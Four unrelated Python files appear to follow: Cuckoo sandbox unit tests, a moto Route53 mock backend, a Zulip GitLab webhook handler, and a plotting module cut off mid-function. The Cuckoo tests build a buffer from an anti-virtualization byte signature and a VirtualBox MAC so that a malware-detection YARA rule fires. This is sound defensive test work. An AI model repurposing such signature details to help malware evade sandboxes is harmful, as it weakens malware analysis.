Dictionary, File, Archive, Buffer, YaraMatch, URL_REGEX
)
from cuckoo.core.startup import init_yara
from cuckoo.main import cuckoo_create
from cuckoo.misc import set_cwd, cwd
from cuckoo.processing.static import PortableExecutable
class TestDictionary(object):
def setup_method(self, method):
self.d = Dictionary()
def test_usage(self):
self.d.a = "foo"
assert "foo" == self.d.a
self.d.a = "bar"
assert "bar" == self.d.a
def test_exception(self):
with pytest.raises(AttributeError):
self.d.b.a
class TestFile(object):
def setup(self):
# File() will invoke cwd(), so any CWD is required.
set_cwd(tempfile.mkdtemp())
self.path = tempfile.mkstemp()[1]
self.file = File(self.path)
def test_get_name(self):
assert self.path.split(os.sep)[-1] == self.file.get_name()
def test_get_data(self):
assert "" == self.file.get_data()
def test_get_size(self):
assert 0 == self.file.get_size()
def test_get_crc32(self):
assert "00000000" == self.file.get_crc32()
def test_get_md5(self):
assert "d41d8cd98f00b204e9800998ecf8427e" == self.file.get_md5()
def test_get_sha1(self):
assert "da39a3ee5e6b4b0d3255bfef95601890afd80709" == self.file.get_sha1()
def test_get_sha256(self):
assert "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" == self.file.get_sha256()
def test_get_sha512(self):
assert "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e" == self.file.get_sha512()
def test_get_ssdeep(self):
try:
import pydeep
assert self.file.get_ssdeep() is not None
pydeep # Fake usage.
except ImportError:
assert self.file.get_ssdeep() is None
def test_get_type(self):
assert "empty" in self.file.get_type()
def test_get_content_type(self):
assert self.file.get_content_type() in ["inode/x-empty", "application/x-empty"]
def test_get_all_type(self):
assert isinstance(self.file.get_all(), dict)
def test_get_all_keys(self):
for key in ["name", "size", "crc32", "md5", "sha1", "sha256", "sha512", "ssdeep", "type"]:
assert key in self.file.get_all()
class TestMagic(object):
def test_magic1(self):
f = File("tests/files/foo.txt")
assert "ASCII text" in f.get_type()
assert f.get_content_type() == "text/plain"
def test_magic2(self):
pe = PortableExecutable(None)
assert "ASCII text" in pe._get_filetype("hello world")
def test_magic3(self):
assert File(__file__).get_type().startswith((
"Python script", "ASCII ",
))
assert File(__file__).get_content_type() in (
"text/x-python", "text/plain",
)
@pytest.mark.skipif("sys.platform != 'linux2'")
def test_symlink_magic(self):
filepath = tempfile.mktemp()
os.symlink(__file__, filepath)
assert File(filepath).get_type().startswith("Python script")
assert File(filepath).get_content_type() == "text/x-python"
def test_regex():
r = re.findall(URL_REGEX, "foo http://google.com/search bar")
assert len(r) == 1
assert "".join(r[0]) == "http://google.com/search"
@pytest.mark.skipif("sys.platform != 'linux2'")
def test_m2crypto():
pe = PortableExecutable("tests/files/icardres.dll")
sig0 = pe.run()["signature"][0]
assert sig0["organization"] == "Microsoft Corporation"
assert sig0["sha1"] == "9e95c625d81b2ba9c72fd70275c3699613af61e3"
def test_yara_offsets():
set_cwd(tempfile.mkdtemp())
cuckoo_create()
init_yara()
buf = (
# The SSEXY payload as per vmdetect.yar
"66 0F 70 ?? ?? 66 0F DB ?? ?? ?? ?? "
"?? 66 0F DB ?? ?? ?? ?? ?? 66 0F EF "
# A VirtualBox MAC address.
"30 38 2d 30 30 2d 32 37"
)
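    # The "??" yara wildcards are replaced with NUL bytes so the rule still
    # matches, and 64 bytes of "A" padding are prepended so the expected string
    # offsets land at 64 and 88, as asserted below.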
filepath = Files.temp_put(
"A"*64 + buf.replace("??", "00").replace(" ", "").decode("hex")
)
assert File(filepath).get_yara() == [{
"meta": {
"description": "Possibly employs anti-virtualization techniques",
"author": "nex"
},
"name": "vmdetect",
"offsets": {
"ssexy": [
(64, 1),
],
"virtualbox_mac_1a": [
(88, 0),
],
},
"strings": [
"MDgtMDAtMjc=",
"Zg9wAABmD9sAAAAAAGYP2wAAAAAAZg/v",
],
}]
def test_yara_no_description():
set_cwd(tempfile.mkdtemp())
cuckoo_create()
open(cwd("yara", "binaries", "empty.yara"), "wb").write("""
rule EmptyRule {
condition:
1
}
rule DescrRule {
meta:
description = "this is description"
condition:
1
}
""")
init_yara()
a, b = File(Files.temp_put("hello")).get_yara()
assert a["name"] == "EmptyRule"
assert a["meta"] == {
"description": "(no description)",
}
assert b["name"] == "DescrRule"
assert b["meta"] == {
"description": "this is description",
}
def test_yara_externals():
set_cwd(tempfile.mkdtemp())
cuckoo_create()
open(cwd("yara", "office", "external.yara"), "wb").write("""
rule ExternalRule {
condition:
filename matches /document.xml/
}
""")
init_yara()
assert not File(Files.temp_put("")).get_yara("office")
assert not File(Files.temp_put("hello")).get_yara("office", {
"filename": "hello.jpg",
})
a, = File(Files.temp_put("hello")).get_yara("office", {
"filename": "document.xml",
})
assert a["name"] == "ExternalRule"
def test_get_urls():
filepath = Files.temp_put("""
http://google.com
google.com/foobar
thisisnotadomain
https://1.2.3.4:9001/hello
""")
assert sorted(File(filepath).get_urls()) == [
        # TODO Why does this not work properly on my own machine?
"http://google.com",
"https://1.2.3.4:9001/hello",
]
class TestArchive(object):
def test_get_file(self):
a = Archive("tests/files/pdf0.zip")
assert a.get_file("files/pdf0.pdf").get_size() == 680
def test_not_temporary_file(self):
f = File("tests/files/pdf0.pdf")
assert os.path.exists("tests/files/pdf0.pdf")
del f
assert os.path.exists("tests/files/pdf0.pdf")
def test_temporary_file(self):
a = Archive("tests/files/pdf0.zip")
f = a.get_file("files/pdf0.pdf")
filepath = f.file_path
assert f.get_size() == 680
assert os.path.exists(filepath)
del f
assert not os.path.exists(filepath)
class TestBuffer(object):
def test_yara_quick(self):
set_cwd(tempfile.mkdtemp())
cuckoo_create()
init_yara()
buf = (
# The SSEXY payload as per vmdetect.yar
"66 0F 70 ?? ?? 66 0F DB ?? ?? ?? ?? "
"?? 66 0F DB ?? ?? ?? ?? ?? 66 0F EF "
)
contents = "A"*64 + buf.replace("??", "00").replace(" ", "").decode("hex")
assert Buffer(contents).get_yara_quick("binaries") == ["vmdetect"]
class TestPubPrivKeys(object):
def test_no_keys(self):
assert File("tests/files/pdf0.pdf").get_keys() == []
def test_pub_key(self):
buf = open("tests/files/pdf0.pdf", "rb").read()
filepath = Files.temp_put((
buf +
"-----BEGIN PUBLIC KEY-----\n"
"HELLOWORLD\n"
"-----END PUBLIC KEY-----" +
buf
))
assert File(filepath).get_keys() == [
"-----BEGIN PUBLIC KEY-----\n"
"HELLOWORLD\n"
"-----END PUBLIC KEY-----"
]
def test_private_key(self):
buf = open("tests/files/pdf0.pdf", "rb").read()
filepath = Files.temp_put((
buf +
"-----BEGIN RSA PRIVATE KEY-----\n"
"HELLOWORLD\n"
"-----END RSA PRIVATE KEY-----" +
buf
))
assert File(filepath).get_keys() == [
"-----BEGIN RSA PRIVATE KEY-----\n"
"HELLOWORLD\n"
"-----END RSA PRIVATE KEY-----"
]
class TestYaraMatch(object):
def test_basics(self):
ym = YaraMatch({
"name": "foo",
"meta": {},
"offsets": {
"a": [
(1, 0),
],
},
"strings": [
"bar".encode("base64"),
],
})
assert ym.string("a", 0) == "bar"
assert ym.string("a") == "bar"
def test_multiple(self):
ym = YaraMatch({
"name": "foo",
"meta": {},
"offsets": {
"a": [
(1, 0),
(2, 2),
],
"b": [
(3, 1),
],
},
"strings": [
"bar".encode("base64"),
"baz".encode("base64"),
"foo".encode("base64"),
],
})
assert ym.string("a", 0) == "bar"
assert ym.string("a", 1) == "foo"
assert ym.string("b", 0) == "baz"
assert ym.strings("a") == ["bar", "foo"]
assert ym.strings("b") == ["baz"]
|
|
from __future__ import unicode_literals
from collections import defaultdict
import uuid
from jinja2 import Template
from moto.core import BaseBackend, BaseModel
from moto.core.utils import get_random_hex
class HealthCheck(BaseModel):
def __init__(self, health_check_id, health_check_args):
self.id = health_check_id
self.ip_address = health_check_args.get("ip_address")
self.port = health_check_args.get("port", 80)
self._type = health_check_args.get("type")
self.resource_path = health_check_args.get("resource_path")
self.fqdn = health_check_args.get("fqdn")
self.search_string = health_check_args.get("search_string")
self.request_interval = health_check_args.get("request_interval", 30)
self.failure_threshold = health_check_args.get("failure_threshold", 3)
@property
def physical_resource_id(self):
return self.id
@classmethod
def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):
properties = cloudformation_json['Properties']['HealthCheckConfig']
health_check_args = {
"ip_address": properties.get('IPAddress'),
"port": properties.get('Port'),
"type": properties['Type'],
"resource_path": properties.get('ResourcePath'),
"fqdn": properties.get('FullyQualifiedDomainName'),
"search_string": properties.get('SearchString'),
"request_interval": properties.get('RequestInterval'),
"failure_threshold": properties.get('FailureThreshold'),
}
health_check = route53_backend.create_health_check(health_check_args)
return health_check
def to_xml(self):
template = Template("""<HealthCheck>
<Id>{{ health_check.id }}</Id>
<CallerReference>example.com 192.0.2.17</CallerReference>
<HealthCheckConfig>
<IPAddress>{{ health_check.ip_address }}</IPAddress>
<Port>{{ health_check.port }}</Port>
<Type>{{ health_check._type }}</Type>
<ResourcePath>{{ health_check.resource_path }}</ResourcePath>
<FullyQualifiedDomainName>{{ health_check.fqdn }}</FullyQualifiedDomainName>
<RequestInterval>{{ health_check.request_interval }}</RequestInterval>
<FailureThreshold>{{ health_check.failure_threshold }}</FailureThreshold>
{% if health_check.search_string %}
<SearchString>{{ health_check.search_string }}</SearchString>
{% endif %}
</HealthCheckConfig>
<HealthCheckVersion>1</HealthCheckVersion>
</HealthCheck>""")
return template.render(health_check=self)
class RecordSet(BaseModel):
def __init__(self, kwargs):
self.name = kwargs.get('Name')
self._type = kwargs.get('Type')
self.ttl = kwargs.get('TTL')
self.records = kwargs.get('ResourceRecords', [])
self.set_identifier = kwargs.get('SetIdentifier')
self.weight = kwargs.get('Weight')
self.region = kwargs.get('Region')
self.health_check = kwargs.get('HealthCheckId')
self.hosted_zone_name = kwargs.get('HostedZoneName')
self.hosted_zone_id = kwargs.get('HostedZoneId')
@classmethod
def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):
properties = cloudformation_json['Properties']
zone_name = properties.get("HostedZoneName")
if zone_name:
hosted_zone = route53_backend.get_hosted_zone_by_name(zone_name)
else:
hosted_zone = route53_backend.get_hosted_zone(
properties["HostedZoneId"])
record_set = hosted_zone.add_rrset(properties)
return record_set
@classmethod
def update_from_cloudformation_json(cls, original_resource, new_resource_name, cloudformation_json, region_name):
cls.delete_from_cloudformation_json(
original_resource.name, cloudformation_json, region_name)
return cls.create_from_cloudformation_json(new_resource_name, cloudformation_json, region_name)
@classmethod
def delete_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):
# this will break if you changed the zone the record is in,
# unfortunately
properties = cloudformation_json['Properties']
zone_name = properties.get("HostedZoneName")
if zone_name:
hosted_zone = route53_backend.get_hosted_zone_by_name(zone_name)
else:
hosted_zone = route53_backend.get_hosted_zone(
properties["HostedZoneId"])
try:
hosted_zone.delete_rrset_by_name(resource_name)
except KeyError:
pass
@property
def physical_resource_id(self):
return self.name
def to_xml(self):
template = Template("""<ResourceRecordSet>
<Name>{{ record_set.name }}</Name>
<Type>{{ record_set._type }}</Type>
{% if record_set.set_identifier %}
<SetIdentifier>{{ record_set.set_identifier }}</SetIdentifier>
{% endif %}
{% if record_set.weight %}
<Weight>{{ record_set.weight }}</Weight>
{% endif %}
{% if record_set.region %}
<Region>{{ record_set.region }}</Region>
{% endif %}
<TTL>{{ record_set.ttl }}</TTL>
<ResourceRecords>
{% for record in record_set.records %}
<ResourceRecord>
<Value>{{ record }}</Value>
</ResourceRecord>
{% endfor %}
</ResourceRecords>
{% if record_set.health_check %}
<HealthCheckId>{{ record_set.health_check }}</HealthCheckId>
{% endif %}
</ResourceRecordSet>""")
return template.render(record_set=self)
def delete(self, *args, **kwargs):
''' Not exposed as part of the Route 53 API - used for CloudFormation. args are ignored '''
hosted_zone = route53_backend.get_hosted_zone_by_name(
self.hosted_zone_name)
if not hosted_zone:
hosted_zone = route53_backend.get_hosted_zone(self.hosted_zone_id)
hosted_zone.delete_rrset_by_name(self.name)
class FakeZone(BaseModel):
def __init__(self, name, id_, private_zone, comment=None):
self.name = name
self.id = id_
if comment is not None:
self.comment = comment
self.private_zone = private_zone
self.rrsets = []
def add_rrset(self, record_set):
record_set = RecordSet(record_set)
self.rrsets.append(record_set)
return record_set
def upsert_rrset(self, record_set):
new_rrset = RecordSet(record_set)
for i, rrset in enumerate(self.rrsets):
if rrset.name == new_rrset.name:
self.rrsets[i] = new_rrset
break
else:
self.rrsets.append(new_rrset)
return new_rrset
def delete_rrset_by_name(self, name):
self.rrsets = [
record_set for record_set in self.rrsets if record_set.name != name]
def delete_rrset_by_id(self, set_identifier):
self.rrsets = [
record_set for record_set in self.rrsets if record_set.set_identifier != set_identifier]
def get_record_sets(self, type_filter, name_filter):
record_sets = list(self.rrsets) # Copy the list
if type_filter:
record_sets = [
record_set for record_set in record_sets if record_set._type == type_filter]
if name_filter:
record_sets = [
record_set for record_set in record_sets if record_set.name == name_filter]
return record_sets
@property
def physical_resource_id(self):
return self.name
@classmethod
def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):
properties = cloudformation_json['Properties']
name = properties["Name"]
hosted_zone = route53_backend.create_hosted_zone(
name, private_zone=False)
return hosted_zone
class RecordSetGroup(BaseModel):
def __init__(self, hosted_zone_id, record_sets):
self.hosted_zone_id = hosted_zone_id
self.record_sets = record_sets
@property
def physical_resource_id(self):
return "arn:aws:route53:::hostedzone/{0}".format(self.hosted_zone_id)
@classmethod
def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):
properties = cloudformation_json['Properties']
zone_name = properties.get("HostedZoneName")
if zone_name:
hosted_zone = route53_backend.get_hosted_zone_by_name(zone_name)
else:
hosted_zone = route53_backend.get_hosted_zone(properties["HostedZoneId"])
record_sets = properties["RecordSets"]
for record_set in record_sets:
hosted_zone.add_rrset(record_set)
record_set_group = RecordSetGroup(hosted_zone.id, record_sets)
return record_set_group
class Route53Backend(BaseBackend):
def __init__(self):
self.zones = {}
self.health_checks = {}
self.resource_tags = defaultdict(dict)
def create_hosted_zone(self, name, private_zone, comment=None):
new_id = get_random_hex()
new_zone = FakeZone(
name, new_id, private_zone=private_zone, comment=comment)
self.zones[new_id] = new_zone
return new_zone
def change_tags_for_resource(self, resource_id, tags):
if 'Tag' in tags:
if isinstance(tags['Tag'], list):
for tag in tags['Tag']:
self.resource_tags[resource_id][tag['Key']] = tag['Value']
else:
key, value = (tags['Tag']['Key'], tags['Tag']['Value'])
self.resource_tags[resource_id][key] = value
        elif 'Key' in tags:
            if isinstance(tags['Key'], list):
                for key in tags['Key']:
                    del self.resource_tags[resource_id][key]
            else:
                del self.resource_tags[resource_id][tags['Key']]
def list_tags_for_resource(self, resource_id):
if resource_id in self.resource_tags:
return self.resource_tags[resource_id]
def get_all_hosted_zones(self):
return self.zones.values()
def get_hosted_zone(self, id_):
return self.zones.get(id_.replace("/hostedzone/", ""))
def get_hosted_zone_by_name(self, name):
for zone in self.get_all_hosted_zones():
if zone.name == name:
return zone
def delete_hosted_zone(self, id_):
return self.zones.pop(id_.replace("/hostedzone/", ""), None)
def create_health_check(self, health_check_args):
health_check_id = str(uuid.uuid4())
health_check = HealthCheck(health_check_id, health_check_args)
self.health_checks[health_check_id] = health_check
return health_check
def get_health_checks(self):
return self.health_checks.values()
def delete_health_check(self, health_check_id):
return self.health_checks.pop(health_check_id, None)
route53_backend = Route53Backend()
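# Usage sketch (editor's illustration, not part of moto's public API):
# >>> zone = route53_backend.create_hosted_zone('example.com', private_zone=False)
# >>> zone.add_rrset({'Name': 'www.example.com', 'Type': 'A',
# ...                 'TTL': 300, 'ResourceRecords': ['192.0.2.1']})
# >>> [rs.name for rs in zone.get_record_sets('A', 'www.example.com')]
# ['www.example.com']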
|
|
from __future__ import absolute_import
from functools import partial
from zerver.lib.actions import check_send_message
from zerver.lib.response import json_success
from zerver.decorator import api_key_only_webhook_view, REQ, has_request_variables
from zerver.lib.webhooks.git import get_push_commits_event_message, EMPTY_SHA,\
get_remove_branch_event_message, get_pull_request_event_message,\
get_issue_event_message, SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE,\
get_commits_comment_action_message, get_push_tag_event_message
from zerver.models import Client, UserProfile
from django.http import HttpRequest, HttpResponse
from typing import Dict, Any, Iterable, Optional, Text
class UnknownEventType(Exception):
pass
def get_push_event_body(payload):
# type: (Dict[str, Any]) -> Text
if payload.get('after') == EMPTY_SHA:
return get_remove_branch_event_body(payload)
return get_normal_push_event_body(payload)
def get_normal_push_event_body(payload):
# type: (Dict[str, Any]) -> Text
compare_url = u'{}/compare/{}...{}'.format(
get_repository_homepage(payload),
payload['before'],
payload['after']
)
commits = [
{
'sha': commit.get('id'),
'message': commit.get('message'),
'url': commit.get('url')
}
for commit in payload.get('commits')
]
return get_push_commits_event_message(
get_user_name(payload),
compare_url,
get_branch_name(payload),
commits
)
def get_remove_branch_event_body(payload):
# type: (Dict[str, Any]) -> Text
return get_remove_branch_event_message(
get_user_name(payload),
get_branch_name(payload)
)
def get_tag_push_event_body(payload):
# type: (Dict[str, Any]) -> Text
return get_push_tag_event_message(
get_user_name(payload),
get_tag_name(payload),
action="pushed" if payload.get('checkout_sha') else "removed"
)
def get_issue_created_event_body(payload):
# type: (Dict[str, Any]) -> Text
return get_issue_event_message(
get_issue_user_name(payload),
'created',
get_object_url(payload),
payload.get('object_attributes').get('iid'),
payload.get('object_attributes').get('description'),
get_objects_assignee(payload)
)
def get_issue_event_body(payload, action):
# type: (Dict[str, Any], Text) -> Text
return get_issue_event_message(
get_issue_user_name(payload),
action,
get_object_url(payload),
payload.get('object_attributes').get('iid'),
)
def get_merge_request_updated_event_body(payload):
# type: (Dict[str, Any]) -> Text
if payload.get('object_attributes').get('oldrev'):
return get_merge_request_event_body(payload, "added commit(s) to")
return get_merge_request_open_or_updated_body(payload, "updated")
def get_merge_request_event_body(payload, action):
# type: (Dict[str, Any], Text) -> Text
pull_request = payload.get('object_attributes')
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
pull_request.get('url'),
pull_request.get('iid'),
type='MR',
)
def get_merge_request_open_or_updated_body(payload, action):
# type: (Dict[str, Any], Text) -> Text
pull_request = payload.get('object_attributes')
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
pull_request.get('url'),
pull_request.get('iid'),
pull_request.get('source_branch'),
pull_request.get('target_branch'),
pull_request.get('description'),
get_objects_assignee(payload),
type='MR',
)
def get_objects_assignee(payload):
    # type: (Dict[str, Any]) -> Optional[Text]
    assignee_object = payload.get('assignee')
    if assignee_object:
        return assignee_object.get('name')
    return None
def get_commented_commit_event_body(payload):
# type: (Dict[str, Any]) -> Text
comment = payload.get('object_attributes')
action = u'[commented]({})'.format(comment['url'])
return get_commits_comment_action_message(
get_issue_user_name(payload),
action,
payload.get('commit').get('url'),
payload.get('commit').get('id'),
comment['note'],
)
def get_commented_merge_request_event_body(payload):
# type: (Dict[str, Any]) -> Text
comment = payload.get('object_attributes')
action = u'[commented]({}) on'.format(comment['url'])
url = u'{}/merge_requests/{}'.format(
payload.get('project').get('web_url'),
payload.get('merge_request').get('iid')
)
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
url,
payload.get('merge_request').get('iid'),
message=comment['note'],
type='MR'
)
def get_commented_issue_event_body(payload):
# type: (Dict[str, Any]) -> Text
comment = payload.get('object_attributes')
action = u'[commented]({}) on'.format(comment['url'])
url = u'{}/issues/{}'.format(
payload.get('project').get('web_url'),
payload.get('issue').get('iid')
)
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
url,
payload.get('issue').get('iid'),
message=comment['note'],
type='Issue'
)
def get_commented_snippet_event_body(payload):
# type: (Dict[str, Any]) -> Text
comment = payload.get('object_attributes')
action = u'[commented]({}) on'.format(comment['url'])
url = u'{}/snippets/{}'.format(
payload.get('project').get('web_url'),
payload.get('snippet').get('id')
)
return get_pull_request_event_message(
get_issue_user_name(payload),
action,
url,
payload.get('snippet').get('id'),
message=comment['note'],
type='Snippet'
)
def get_wiki_page_event_body(payload, action):
# type: (Dict[str, Any], Text) -> Text
return u"{} {} [Wiki Page \"{}\"]({}).".format(
get_issue_user_name(payload),
action,
payload.get('object_attributes').get('title'),
payload.get('object_attributes').get('url'),
)
def get_build_hook_event_body(payload):
# type: (Dict[str, Any]) -> Text
build_status = payload.get('build_status')
if build_status == 'created':
action = 'was created'
elif build_status == 'running':
action = 'started'
else:
action = 'changed status to {}'.format(build_status)
return u"Build {} from {} stage {}.".format(
payload.get('build_name'),
payload.get('build_stage'),
action
)
def get_pipeline_event_body(payload):
# type: (Dict[str, Any]) -> Text
pipeline_status = payload.get('object_attributes').get('status')
if pipeline_status == 'pending':
action = 'was created'
elif pipeline_status == 'running':
action = 'started'
else:
action = 'changed status to {}'.format(pipeline_status)
builds_status = u""
for build in payload.get('builds'):
builds_status += u"* {} - {}\n".format(build.get('name'), build.get('status'))
return u"Pipeline {} with build(s):\n{}.".format(action, builds_status[:-1])
def get_repo_name(payload):
# type: (Dict[str, Any]) -> Text
return payload['project']['name']
def get_user_name(payload):
# type: (Dict[str, Any]) -> Text
return payload['user_name']
def get_issue_user_name(payload):
# type: (Dict[str, Any]) -> Text
return payload['user']['name']
def get_repository_homepage(payload):
# type: (Dict[str, Any]) -> Text
return payload['repository']['homepage']
def get_branch_name(payload):
# type: (Dict[str, Any]) -> Text
return payload['ref'].replace('refs/heads/', '')
def get_tag_name(payload):
# type: (Dict[str, Any]) -> Text
return payload['ref'].replace('refs/tags/', '')
def get_object_iid(payload):
# type: (Dict[str, Any]) -> Text
return payload['object_attributes']['iid']
def get_object_url(payload):
# type: (Dict[str, Any]) -> Text
return payload['object_attributes']['url']
EVENT_FUNCTION_MAPPER = {
'Push Hook': get_push_event_body,
'Tag Push Hook': get_tag_push_event_body,
'Issue Hook open': get_issue_created_event_body,
'Issue Hook close': partial(get_issue_event_body, action='closed'),
'Issue Hook reopen': partial(get_issue_event_body, action='reopened'),
'Issue Hook update': partial(get_issue_event_body, action='updated'),
'Note Hook Commit': get_commented_commit_event_body,
'Note Hook MergeRequest': get_commented_merge_request_event_body,
'Note Hook Issue': get_commented_issue_event_body,
'Note Hook Snippet': get_commented_snippet_event_body,
'Merge Request Hook open': partial(get_merge_request_open_or_updated_body, action='created'),
'Merge Request Hook update': get_merge_request_updated_event_body,
'Merge Request Hook merge': partial(get_merge_request_event_body, action='merged'),
'Merge Request Hook close': partial(get_merge_request_event_body, action='closed'),
'Wiki Page Hook create': partial(get_wiki_page_event_body, action='created'),
'Wiki Page Hook update': partial(get_wiki_page_event_body, action='updated'),
'Build Hook': get_build_hook_event_body,
'Pipeline Hook': get_pipeline_event_body,
}
@api_key_only_webhook_view("Gitlab")
@has_request_variables
def api_gitlab_webhook(request, user_profile, client,
stream=REQ(default='gitlab'),
payload=REQ(argument_type='body')):
# type: (HttpRequest, UserProfile, Client, Text, Dict[str, Any]) -> HttpResponse
event = get_event(request, payload)
body = get_body_based_on_event(event)(payload)
subject = get_subject_based_on_event(event, payload)
check_send_message(user_profile, client, 'stream', [stream], subject, body)
return json_success()
def get_body_based_on_event(event):
# type: (str) -> Any
return EVENT_FUNCTION_MAPPER[event]
def get_subject_based_on_event(event, payload):
# type: (str, Dict[str, Any]) -> Text
if event == 'Push Hook':
return u"{} / {}".format(get_repo_name(payload), get_branch_name(payload))
elif event == 'Build Hook':
return u"{} / {}".format(payload.get('repository').get('name'), get_branch_name(payload))
elif event == 'Pipeline Hook':
return u"{} / {}".format(
get_repo_name(payload),
payload.get('object_attributes').get('ref').replace('refs/heads/', ''))
elif event.startswith('Merge Request Hook'):
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='MR',
id=payload.get('object_attributes').get('iid'),
title=payload.get('object_attributes').get('title')
)
elif event.startswith('Issue Hook'):
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='Issue',
id=payload.get('object_attributes').get('iid'),
title=payload.get('object_attributes').get('title')
)
elif event == 'Note Hook Issue':
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='Issue',
id=payload.get('issue').get('iid'),
title=payload.get('issue').get('title')
)
elif event == 'Note Hook MergeRequest':
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='MR',
id=payload.get('merge_request').get('iid'),
title=payload.get('merge_request').get('title')
)
elif event == 'Note Hook Snippet':
return SUBJECT_WITH_PR_OR_ISSUE_INFO_TEMPLATE.format(
repo=get_repo_name(payload),
type='Snippet',
id=payload.get('snippet').get('id'),
title=payload.get('snippet').get('title')
)
return get_repo_name(payload)
def get_event(request, payload):
# type: (HttpRequest, Dict[str, Any]) -> str
event = request.META['HTTP_X_GITLAB_EVENT']
if event == 'Issue Hook':
action = payload.get('object_attributes').get('action')
event = "{} {}".format(event, action)
elif event == 'Note Hook':
action = payload.get('object_attributes').get('noteable_type')
event = "{} {}".format(event, action)
elif event == 'Merge Request Hook':
action = payload.get('object_attributes').get('action')
event = "{} {}".format(event, action)
elif event == 'Wiki Page Hook':
action = payload.get('object_attributes').get('action')
event = "{} {}".format(event, action)
if event in list(EVENT_FUNCTION_MAPPER.keys()):
return event
raise UnknownEventType(u'Event {} is unknown and cannot be handled'.format(event))
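# Dispatch sketch (editor's note): GitLab's X-Gitlab-Event header plus the payload's
# object_attributes.action compose the mapper key, e.g. an 'Issue Hook' event whose
# action is 'close' becomes 'Issue Hook close', which dispatches to
# partial(get_issue_event_body, action='closed') in EVENT_FUNCTION_MAPPER.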
|
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 02 09:38:14 2015
@author: Anna Stuhlmacher
plotting
"""
from __future__ import division, absolute_import
import logging
import numpy as np
import scipy as sp
import scipy.interpolate as spinterp
import time
import datetime as dt
import matplotlib.pyplot as plt
from matplotlib.dates import DateFormatter
from matplotlib.ticker import ScalarFormatter
import matplotlib.cm as cm
from mpl_toolkits import mplot3d
import pkg_resources as pkgr
#from mpl_toolkits.mplot3d import Axes3D
#from matplotlib import cm
#from matplotlib import ticker
#
from .CoordTransforms import angles2xy#,sphereical2Cartisian
from .GeoData import GeoData
# NOTE: using usetex can make complicated plots unstable and crash
#try:
# plt.rc('text', usetex=True)
# plt.rc('font', family='serif')
#except Exception as e:
# logging.info('Latex install not complete, falling back to basic fonts. apt-get install dvipng')
#
sfmt = ScalarFormatter(useMathText=True)
#%%
def vergeq(packagename, verstring):
    """
    Check whether the installed version of a package is newer than a given
    version string.
    Inputs
    packagename - The name of the package to be tested.
    verstring - The desired version in string form, with numbers separated by periods.
    Output
    boolcheck - True if the installed version is greater than verstring.
    """
    return pkgr.parse_version(pkgr.get_distribution(packagename).version) > pkgr.parse_version(verstring)
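# Example (editor's sketch):
# >>> vergeq('matplotlib', '1.3.1')  # True on any reasonably recent install
# True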
try:
plt.get_cmap('plasma')
defmap = 'viridis'
defmap3d = 'viridis'
except ValueError:
defmap = 'jet'
defmap3d = 'jet'
def _dointerp(geodatalist,altlist,xyvecs,picktimeind):
opt = None; isr = None #in case of failure
xvec = xyvecs[0]
yvec = xyvecs[1]
x, y = np.meshgrid(xvec, yvec)
z = np.ones(x.shape)*altlist
new_coords = np.column_stack((x.ravel(), y.ravel(), z.ravel()))
extent=[xvec.min(), xvec.max(), yvec.min(), yvec.max()]
key={}
#%% iterative demo, not used yet
# inst = []
# for g in geodatalist:
# if g is None:
# continue
# for k in g.data.keys():
# try:
# G = g.timeslice(picktimeind)
# G.interpolate(new_coords, newcoordname='Cartesian', method='nearest', fill_value=np.nan)
# interpData = G.data[k]
# inst.append(interpData[:,0].reshape(x.shape))
# except Exception as e:
# logging.warning('skipping instrument {}'.format(e))
#%% optical
g = geodatalist[0]
if g is not None:
try:
key['opt'] = list(g.data.keys()) #list necessary for Python3
G = g.timeslice(picktimeind)
G.interpolate(new_coords, newcoordname='Cartesian', method='nearest', fill_value=np.nan)
interpData = G.data[key['opt'][0]]
opt = interpData[:, 0].reshape(x.shape)
except IndexError as e:
logging.warning('did you pick a time index outside camera observation? {}'.format(e))
except Exception as e:
logging.error('problem in optical interpolation {}'.format(e))
#%% isr
g = geodatalist[1]
if g is not None:
try:
key['isr'] = list(g.data.keys()) #list necessary for Python3
G = g.timeslice(picktimeind)
G.interpolate(new_coords, newcoordname='Cartesian', method='nearest',
fill_value=np.nan)
interpData = G.data[key['isr'][0]]
isr = interpData[:, 0].reshape(x.shape)
except Exception as e:
logging.error('problem in ISR interpolation {}'.format(e))
return opt,isr,extent,key,x,y
#%%
def alt_slice_overlay(geodatalist, altlist, xyvecs, vbounds, title, axis=None,picktimeind=[0]):
"""
geodatalist - A list of geodata objects that will be overlayed, first object is on the bottom and in gray scale
altlist - A list of the altitudes that we can overlay.
xyvecs- A list of x and y numpy arrays that have the x and y coordinates that the data will be interpolated over. ie, xyvecs=[np.linspace(-100.0,500.0),np.linspace(0.0,600.0)]
vbounds = a list of bounds for each geodata object. ie, vbounds=[[500,2000], [5e10,5e11]]
title - A string that holds for the overall image
picktimeind - indices in time to extract and plot (arbitrary choice)
Returns an image of an overlayed plot at a specific altitude.
"""
ax = axis #less typing
opt, isr,extent, key, x, y = _dointerp(geodatalist, altlist, xyvecs, picktimeind)
#%% plots
if ax is None:
fg = plt.figure()
ax = fg.gca()
ax.set_title(title)
ax.set_xlabel('x')
ax.set_ylabel('y')
else:
fg = ax.get_figure()
#%%
try:
bottom = ax.imshow(opt, cmap='gray', extent=extent, origin='lower', interpolation='none',
vmin=vbounds[0][0], vmax=vbounds[0][1])
c = fg.colorbar(bottom, ax=ax)
c.set_label(key['opt'][0])
except Exception as e:
